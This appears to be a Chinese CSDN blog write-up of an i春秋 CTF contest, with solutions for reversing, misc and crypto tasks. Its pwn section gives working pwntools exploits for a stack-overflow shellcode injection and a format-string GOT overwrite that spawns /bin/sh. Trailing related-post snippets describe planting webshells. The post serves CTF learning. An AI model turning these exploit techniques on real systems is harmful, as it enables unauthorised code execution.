i春秋CTF答题赛(第三季)WriteUp

最新推荐文章于 2024-05-09 19:30:36 发布
最新推荐文章于 2024-05-09 19:30:36 发布
阅读量1.6k 收藏 1
点赞数 1
文章标签: i春秋CTF答题赛(第三季)WriteUp writeup i春秋CTF答题赛(第三季)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/103351160
版权

i春秋CTF答题赛(第三季)WriteUp

文章首发于我的博客:https://mrskye.cn

Re

幸运数字

分析 main 函数得出,只要输入的值经过加密转换之后等于H5wg_2g_MCif_T1ou_v7v7v,就会返回真正 flag 。加密算法只针对字符串中的英文字符。

分析中间加密部分可知,如果密文是大写字母,那么明文也是大写字母;小写字母同理。如果想检验的下面给出加密部分的 c 源码,自己加一个循环上去,看看就知道了。

#include <stdio.h>
#include <cstring>
int main()
{
	char a_list[]= "N5cm_2m_SIol_Z1ua_b7b7b";
	unsigned int v5=strlen(a_list)+1;
	int i;
	char v8;
	char v9;
	for(i=0;i<=v5-2;++i)
	{
		v8 = a_list[i];
		if(v8>'Z'||v8<'A')
		{
			if(v8>'z'||v8<'a')
			continue;
			v9 = (v8 - 83) % 26 + 97;
		}
		else
		{
			v9 = (v8 - 51) % 26 + 65;
		 } 
		a_list[i] = v9;
	}
	printf("%s",a_list);
 }

反正明文组合也不多,就爆破之。最终 exp 如下:

import string
a = "H5wg_2g_MCif_T1ou_v7v7v"
b = ""
ascii_lowercase = string.ascii_lowercase
ascii_uppercase = string.ascii_uppercase

for letter in a:
	log = 0
	if letter in ascii_uppercase:
		for upper in ascii_uppercase:
			c_upper = (ord(upper)-51)%26+65
			if chr(c_upper) == letter:
				b += upper
				log = 1
				print("[+]{} is find --> {}".format(letter,upper))
	if letter in ascii_lowercase:
		for lower in ascii_lowercase:
			c_lower = (ord(lower)-83)%26+97
			if chr(c_lower) == letter:
				b += lower
				log = 1
				print("[+]{} is find --> {}".format(letter,lower))
	if log == 0:
		b += letter
		print("[+]{} is find.".format(letter))
print(b)
flag

flag{T5is_2s_YOur_F1ag_h7h7h}

Misc

word

密码:cq19

白给

flag

flag{obol0dxf-adtr-1vft-p7ng-djulcfsbil3y}

Crypto

md5_brute

将4个 md5 拿去解密得到flag。

在线md5解密

flag

flag{wangwu-2019-1111-9527}

code

差分曼彻斯特编码 + 十六进制转字符串

msg1 = 0x9a9a9a6a9aa9656699a699a566995956996a996aa6a965aa9a6aa596a699665a9aa699655a696569655a9a9a9a595a6965569a59665566955a6965a9596a99aa9a9566a699aa9a969969669aa6969a9559596669
s = bin(msg1)[2:]
print s
r = ""
tmp = 0
for i in xrange(len(s) / 2):
    c = s[i * 2]
    if c == s[i * 2 - 1]:
        r += '1'
    else:
        r += '0'
print hex(int(r, 2))[2:-1].decode('hex')
flag

flag{zw1tt1hl-7zcv-ebfk-akxt-i4xdsxeuv5d3}

encrypt

flag

flag{Easy!eAsy!eaSy!}

Pwn

Electrical System

64位,仅有 NX 保护的程序。通过 IDA 分析,在菜单选择列表中,存在着栈溢出的漏洞。

分析源码得出,在输入 ID 时,数据(&buf)将会保存到 .bss 段,输入地址0x6020e0,检查发现这个程序的 .bss 段有可执行权限。

最终利用思路:输入 ID 时,把 shellcode 输进去。在菜单时,输入Check或者Recharge,避免exit(0),然后精心构造栈上数据,将 rip 覆写为 .bss 段地址(0x6020e0)。

Q:为什么需要输入输入Check或者Recharge?

A:覆写的是 menu_brand(0x0000000000400AEE) 返回地址,即完成一次菜单选择才会返回上层的循环(被覆写后则跳转到 .bss 段),因此需要确保不会触发 menu_brand 的 exit() 函数,所以需要输入一个功能选项。这里为了简单就选 Check 。

最终exp如下:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
#p = remote('120.55.43.255',11002)
p = process("./pwn")
p.recvuntil('ID:\n')
p.sendline(asm(shellcraft.sh()))

recharge_addr = 0x0000000000400A6F
sh_addr = 0x00000000006020E0

p.recvuntil('choice:\n')
p.sendline('Check' + 11 * 'a' + p64(sh_addr))
p.interactive()
flag

flag{8e0ab265-066c-4d9c-8cc4-bd5a425aadae}

后记

pwndbg 的 REGISTERS 查看不知道有没有坑?在栈溢出时,实际上已经覆写了 rip 的值,但是 REGISTERS 显示的是原值。通过查内存(0x7fffffffdd48),可以证实 rip 已经被覆写了。又或者将 payload 的 .bss 地址修改为 ‘a’*0x8 ,就会报错,然后 gdb 程序并加载生成的 core文件,查询 rip 的值。

···
Please enter your choice:
Checkaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Breakpoint 1, 0x0000000000400b5d in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────[ REGISTERS ]─────────────────
RDI  0x7fffffffdd38 ◂— 'Checkaaaaaaaaaaaaaaaaaaaaaaaaaaa'
RSI  0x400ec7 ◂— push   0x6b6365 /* 'Check' */
RBP  0x7fffffffdd40 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaa'
RIP  0x400b5d ◂— call   0x400a3a
─────────────────[ STACK ]─────────────────
00:0000│ rsp  0x7fffffffdd30 ◂— 0x0
01:0008│ rdi  0x7fffffffdd38 ◂— 'Checkaaaaaaaaaaaaaaaaaaaaaaaaaaa'
02:0010│ rbp  0x7fffffffdd40 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaa'
... ↓
05:0028│      0x7fffffffdd58 ◂— 0x500000000
06:0030│      0x7fffffffdd60 —▸ 0x400ce0 ◂— push   r15
07:0038│      0x7fffffffdd68 —▸ 0x7ffff7a2d830 (__libc_start_main+240) ◂— mov    edi, eax

pwndbg> x/20gx 0x7fffffffdd38
0x7fffffffdd38:	0x6161616b63656843	0x6161616161616161
0x7fffffffdd48:	0x6161616161616161	0x6161616161616161
0x7fffffffdd58:	0x0000000500000000	0x0000000000400ce0
0x7fffffffdd68:	0x00007ffff7a2d830	0x0000000000000001
0x7fffffffdd78:	0x00007fffffffde48	0x00000001f7ffcca0
0x7fffffffdd88:	0x0000000000400bc6	0x0000000000000000

Car Search System

格式化字符串漏洞,关键代码位置如图:

程序只有 NX 保护。利用思路: printf 处格式化漏洞泄露出 __libc_start_main+247 地址,得出 libc 基地址,将 put.got 覆写为 system ,修改 v7 值,利用 read 函数读入 /bin/sh ,调用 put 函数,触发 system(’/bin/sh’) 。

修改 v7 值时,直接修改栈上的值,程序会down,所有可以通过指针 v8 来修改。----pumpkin9

最终exp如下:

# coding:utf-8
from pwn import *
context.terminal=['tmux','split','-h']
context.log_level = 'debug'
p = process("./pwn2")
#p = remote("120.55.43.255",11001)
elf=ELF("./pwn2")
# 自己从本地函数库拉取
lib = ELF("./libc.so.6")
# 字符指针到buf偏移
offset = 30

# leak libc base addr 
p.recvuntil("leave\n")
p.sendline("%59$p") # 偏移59在eip开头;这里读取的是eip
__libc_start_main = int(p.recvline().strip("\n"),16)-247
print hex(__libc_start_main)
libc = __libc_start_main - lib.symbols['__libc_start_main']
log.success("libc base addr : 0x%x"%libc)
system = libc+lib.symbols['system']
log.success("system addr : 0x%x"%system)

# overwrite put.got to system
p.recvuntil("leave\n")
payload = fmtstr_payload(30,{elf.got["puts"]:system})
p.sendline(payload)

# leak v7 addr
p.recvuntil("leave\n")
payload = "%51$p" # v7 偏移51
p.sendline(payload)
point = int(p.recvline().strip("\n"),16)
log.success("v7 addr : 0x%x"%point)

# overwrite v7 to 102
p.recvuntil("leave\n")
payload = p32(point)+"%98c%30$hhn" #偏移30以单个字节读入ascii为98单个字符
p.sendline(payload)

# get shell
p.sendlineafter("ar in 7 day","/bin/sh\x00")
# gdb.attach(p)
p.interactive()
SkYe231_
关注
i春秋ctf夺旗(第四季)wirteup——misc
jammny
01-03 3214
前言:这次参加了i春秋ctf夺旗,misc类型一共有两道题。在这里跟大家分享一下解题步骤以及思路。 第一道题,XImg 下载文件解压后,得到一张png图片 这道题考察是图片隐写。图片隐写是misc常见的题型之一,接下来我会详细讲解一下解题步骤。 工具:stegsovle 1、把图片放到stegsovle分析,程序最下面有两个小按钮,不断点击直到得到一个被隐藏的二维码。 2、按...
i春秋ctf训练营writeup-手贱的A君
bbszhenshuai的博客
05-18 1589
导语 i春秋也是个学东西的好地方呀。 手贱的A君 关键词:数据库,md5,拿着这一串莽头去md5在线解密 果然不会那么简单的。 定睛一看,这md5好像是33位啊¿ 定睛两看,这怎么害有个l啊?众所周知md5的内容里只有0-9和abcdef呀? 删去l再解密,果然正确了。 md5 MD5算法的原理可简要的叙述为:MD5码以512位分组来处理输入的信息,且每一分组又被划分为16个32位子分组,经过了一系列的处理后,算法的输出由四个32位分组组成,将这四个32位分组级联后将生成一个128位散列值。 [6]
I春秋第四季CTF-Web-Writeup(部分)
1stPeak's Blog
02-21 1719
PHP反序列化 题目总共有三个php文件 第一个:index.php 第二个:show.php 第三个:user.php 题目:http://120.55.43.255:24719,进去后没有看见任何东西 我们查看源代码:发现了一个链接 接下来,我们访问该链接,看看有什么 哦?那我们再看看user.php里有什么,什么都没有 接下来使用php伪协议分别获取index.php、show.php、us...
i春秋 429-线上题(二)Writeup
驻足
04-18 1152
“360企业安全春秋杯”网络安全技术大—-线上题(二)Writeup 主体思路 利用phpmyadmin中记录查询日志功能,成功将一句话写入服务器中,之后菜刀连接拿到shell 具体实现 具体实现部分我已在我的博客中写明,还请移步 Marsguest’s Blog...
i春秋 百度杯 CTF(二月场) Misc web题解 By Assassin
qq_43679818的博客
11-13 1954
i春秋 百度杯 CTF(二月场) Misc web题解 By Assassin
WP 4 i春秋_internetwache-ctf-2016
segOt
04-16 2236
The hidden message Quick run rock-with-the-wired-shark The hidden message 辨识八进制,ascii转换,base64 Description: My friend really can’t remember passwords. So he uses some kind of obfuscation. Can you re
i春秋 CTF大本营 竞训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞训练营 200+道题目答案 竞包括冬令营白帽黑客专项训练春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
i春秋ctf夺旗(第四季)writeup——web
jammny
01-06 1878
前言: 这次的比一共有六道web题,接下我会详细介绍解题的步骤以及思路,以便让小白和没有接触过这类题型的小伙伴们能读懂。 第一题,nani 1、打开网页啥都没有,内容一片空白啥。这时候我们应该按F12去查看网页源码。往往很多提示和关键性信息都藏在这里。如图所示: 2、得到提示:./index.php?file=show.php ;看到关键字file,下意识想会不会存在文件包含呢?不急,我们先去访...
CTF答题夺旗(第四季)i春秋wp
JoJo48的博客
12-27 2296
i春秋CTF答题夺旗(4th) 地址:https://ictf.ichunqiu.com/ 1、Misc题 下载地址:http://120.55.43.255:34536/115FA9AF83B2997E/XImg.zip 解题思路:下载后是一张图片,因此觉得是图片隐写的可能性很大。先看图片本身的样子是不全的,所以有想法是不是要改变图片长、宽。还是老规矩先看看图片里有没有东西拖到虚拟机。 (1)...
CTF收集的题和writeup.zip
09-30
"CTF收集的题和writeup.zip"是一个包含这些挑战题和解决方案的压缩包,对于学习和提高网络安全技能非常有价值。 在"CTF-WP-main"这个压缩包子文件中,我们可以期待找到以下几个方面的知识点: 1. **逆向...
2019全国大学生信息安全第一天线上初-情景模拟题(CTF
04-21
本资料为2019全国大学生信息安全第一天线上初-情景模拟题,是个人答题的时候截下来的。分享给有需要的童鞋。
i春秋 include wp
weixin_45253216的博客
01-16 190
继续水题 i春秋上的一道50分简单题目,提示是文件包含include。 记得原来做的文件包含题目,直接用php://filter就能把flag文件以base64编码的格式显示出来,这么简单一题,应该一样。 什么都没有,猜测在根目录下。 还是什么都没有,那咋办?估计flag被改名了,所以要查看目录结构,要知道PHP伪协议不只有read,还有input输入。 查看目录结构ls,然后就发现了一个贼丑的php文件,肯定是把flag的名改成这个了。 对返回的base64编码解码,果然flag。 ...
i春秋CTF-YeserCMS
苟有恒,必有三更眠,五更起。
09-06 822
分析 打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS 于是百度EasyCMS的漏洞,发现cmseasy 无限制报错注入(可获取全站信息exp) 访问url/celive/live/header.php,直接进行报错注入 数据库: xajax=Postdata&amp;xajaxargs[0]=&lt;xjxquery&gt;&...
web刷题记录,查询使用
devil8123665的博客
10-28 2480
1、[RoarCTF 2019]Easy Calchttps://buuoj.cn wp:https://blog.csdn.net/mochu7777777/article/details/109169796 注意点: 使用scandir()函数+chr()函数绕过代码执行 /calc.php?%20num=var_dump(scandir(chr(47))) 或者使用glob()函数 /calc.php?%20num=var_dump(glob(chr(47).chr(42))..
i春秋CTF训练 Misc Web 爆破-3
椰奶冻不安全的博客
06-30 448
Misc Web 爆破-3 题目内容:这个真的是爆破。 链接需到ichunqiu网站申请 页面显示出源码 <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea'; } if($_SESSIO
CTF-Web Exploitation(持续更新)
最新发布
huckers的博客
05-09 1155
根据提示使用不同的请求方式得到response可能会得到结果使用抓包工具Burp Suit抓取链接请求信息修改请求方式POST/GET为HEAD发送请求,获取包含flag的响应信息TheHEADGETHEAD方法请求与GET请求相同的响应,但没有响应正文。Burp Suite是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。本题中使用。
CTF入门--请输入密码
Quartz's Blog
09-05 5708
在一个网站上遇到了几个题目,自己看了看还是挺有趣的,故记录之初探题目 这里是一个密码框 显然是让我们输入密码,先随便试试吧,ll 来个123 然后结果看见,还被嘲讽了一番,(笑)开始分析做到动态的弹窗,肯定使用了动态脚本语言, 所以我们F12 来一探究竟 下面就是看到了我们,和密码相关的代码段了 逻辑清晰,简单高效 重要的就是下面的if的判断,得到pass1即可 然后打断点
光棍节程序员闯关秀通关录
weixin_30498921的博客
11-05 197
第一关 按F12查看元素,在HTML代码中找下,发现一个颜色与背景色相同的超链接,直接复制提交或者将鼠标移动到对应位置会自动变成手型。 直接复制key提交,进入第二关:https://1111.segmentfault.com/?k=26a2edb9dc4e342ebbc38e180113bcce 第二关 继续查看元素,在HTML的注释中找到了key: ...
BUUCTF-逆向[GXYCTF2019]luck_guy1题解
m0_62584974的博客
04-05 1297
BUUCTF-逆向[GXYCTF2019]luck_guy1题解,有关伪随机数知识和小端序存储知识
php upload ctf,强网杯CTF防御ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ```php <?php error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] . "<br />"; } else { echo "Upload: " . $_FILES["upload"]["name"] . "<br />"; echo "Type: " . $_FILES["upload"]["type"] . "<br />"; echo "Size: " . ($_FILES["upload"]["size"] / 1024) . " Kb<br />"; move_uploaded_file($_FILES["upload"]["tmp_name"], "upload/" . $_FILES["upload"]["name"]); echo "Stored in: " . "upload/" . $_FILES["upload"]["name"]; } ?> ``` 从上述代码中我们可以发现,这是一个文件上传的代码,该代码运行后会将用户上传的文件存储到 `upload` 目录下。 但是,该代码没有对上传的文件类型进行限制,这意味着我们可以上传任何类型的文件,甚至是一些恶意的文件。我们可以尝试上传一些常见的恶意文件,比如 `webshell`。 我们可以在本地创建一个 `webshell.php` 文件,然后上传到服务器上的 `upload` 目录。上传完成后,我们可以访问 `http://xxx.xxx.xxx.xxx/upload/webshell.php` 来执行我们上传的 `webshell`。 最后,我们需要注意的是,该上传脚本没有做任何安全性检查,这意味着我们可以上传任意大小的文件,这可能会影响服务器的性能,甚至导致服务器崩溃。因此,在实际应用中,我们应该对上传的文件大小进行限制,同时对上传的文件类型进行检查,从而确保服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值